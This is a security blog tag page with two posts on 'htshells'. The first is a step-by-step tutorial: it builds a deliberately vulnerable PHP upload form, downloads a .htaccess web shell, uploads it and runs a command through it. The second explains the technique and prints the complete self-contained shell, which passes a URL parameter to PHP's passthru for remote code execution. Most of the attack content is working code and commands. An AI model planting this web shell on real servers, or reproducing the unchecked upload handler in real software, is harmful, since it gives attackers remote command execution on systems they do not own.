Results tagged “htshells” from Just Another Hacker

htshells tutorial

|
Here is a quick tutorial on how to use the .htaccess shell attack. I did this on a backtrack 5 vm, the upload example is loosely based on (http://www.w3schools.com/PHP/php_file_upload.asp). The first thing we do is create our vulnerable "application", like this:

root@bt:/var/www# mkdir htshells
root@bt:/var/www# cd htshells/
root@bt:/var/www/htshells# chmod 777 .
root@bt:/var/www/htshells# cat > index.html
<html>
<body>

<form action="upload_file.php" method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="file" id="file" />
<br />
<input type="submit" name="submit" value="Submit" />
</form>

</body>
</html> 
root@bt:/var/www/htshells# cat > upload_file.php
<?php
if ($_FILES['file']['error'] > 0)
  {
  echo "Error: ".$_FILES['file']['error']."<br />";
  }
else
  {
  echo "Upload: ".$_FILES['file']['name']."<br />";
  echo "Type: ".$_FILES['file']['type']."<br />";
  echo "Size: " . ($_FILES['file']['size'] / 1024) . " Kb<br />";
  echo "Stored in: ".$_FILES['file']['tmp_name']."<br />";
  }
  if (file_exists($_FILES['file']['name']))
  {
      echo $_FILES['file']['name']." already exists.";
  }
  else
  {
      move_uploaded_file($_FILES['file']['tmp_name'],$_FILES['file']['name']);
      echo "Moved to: ".$_FILES['file']['name'];
  }
?> 
Next we have to change the apache configuration, as backtrack comes with secure defaults.
 
root@bt:/var/www# vim /etc/apache2/sites-enabled/000-default 
Change the AllowOverride argument to all under the /var/www directory configuration
        <Directory /var/www/>
                Options Indexes FollowSymLinks MultiViews
                AllowOverride All
                Order allow,deny
                allow from all
        </Directory>
Then start apache
root@bt:/var/www/htshells# apache2ctl start
Next we grab and prepare our payload:
root@bt:/var/www/htshells# cd /root
root@bt:~# wget https://github.com/wireghoul/htshells/raw/master/htaccess.php
--2011-06-01 20:16:16--  https://github.com/wireghoul/htshells/raw/master/htaccess.php
Resolving github.com... 207.97.227.239
Connecting to github.com|207.97.227.239|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 536 [text/plain]
Saving to: `htaccess.php'

100%[========================================================================================>] 536         --.-K/s   in 0s      

2011-06-01 20:16:18 (53.1 MB/s) - `htaccess.php' saved [536/536]

root@bt:~# mv htaccess.php .htaccess
root@bt:~# 

Next we visit our demo application in the browser
upload_form.png

Select the file to upload (you might have to right click and select show hidden files)
upload_file.png

Submit the file for upload
upload success.png

Now visit the .htaccess file and start running some commands:
root@bt:/var/www/htshells# GET http://localhost/htshells/.htaccess?c=id
# Self contained .htaccess web shell - Part of the htshell project
# Written by Wireghoul - http://www.justanotherhacker.com

# Override default deny rule to make .htaccess file accessible over web
<Files ~ "^\.ht">
    Order allow,deny
    Allow from all
</Files>

# Make .htaccess file be interpreted as php file. This occur after apache has interpreted 
# the apache directoves from the .htaccess file
AddType application/x-httpd-php .htaccess

###### SHELL ###### 
uid=33(www-data) gid=33(www-data) groups=33(www-data)
###### LLEHS ######
A while back I was testing a CMS that had a curious feature, all uploaded files were placed in their own directory. This was not a security enhancement as the application allowed php files to be uploaded. However I coudn't help ask, what if php uploads had been restricted? The answer was .htaccess files. Using SetHandler in a .htaccess file is well known, but does not lead to remote code execution. So after some thinking I put together some self contained .htaccess web shells. I wrote both a php and a server side include shells, but other options can easily be added (jsp, mod_perl, etc).

This works by first diverting the default apache .htaccess access restriction from within the .htaccess file so we can access it as a url. Next we reconfigure the .htaccess extension to be treated as a dynamic content script and finally we have our payload. The attack works because the .htaccess parsing and processing for apache configuration directives occur before the .htaccess file is processed as a web request. There is a relatively small gotcha, the payload has to be commented out with a # at the start so it doesn't get interpreted by apache and likewise, the script interpreter must ignore the apache directives. PHP lends itself well to this as any content not within the <?php ?> tags are presented as is.

# Self contained .htaccess web shell - Part of the htshell project
# Written by Wireghoul - http://www.justanotherhacker.com

# Override default deny rule to make .htaccess file accessible over web
<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>

# Make .htaccess file be interpreted as php file. This occur after apache has interpreted
# the apache directoves from the .htaccess file
AddType application/x-httpd-php .htaccess

###### SHELL ###### <?php echo "\n";passthru($_GET['c']." 2>&1"); ?>###### LLEHS ######

Simply upload the preferred shell as a .htaccess file and then visit the .htaccess file via the url http://domain/path/.htaccess?c=command for remote code execution. The collection of attack files are collectively accessible from my github htshells repository.

Update: Due to the large number of comments on this post I have created more project information including a FAQ and tutorial under the project page.
No Clean Feed - Stop Internet Censorship in Australia
Creative Commons License
This weblog is licensed under a Creative Commons License.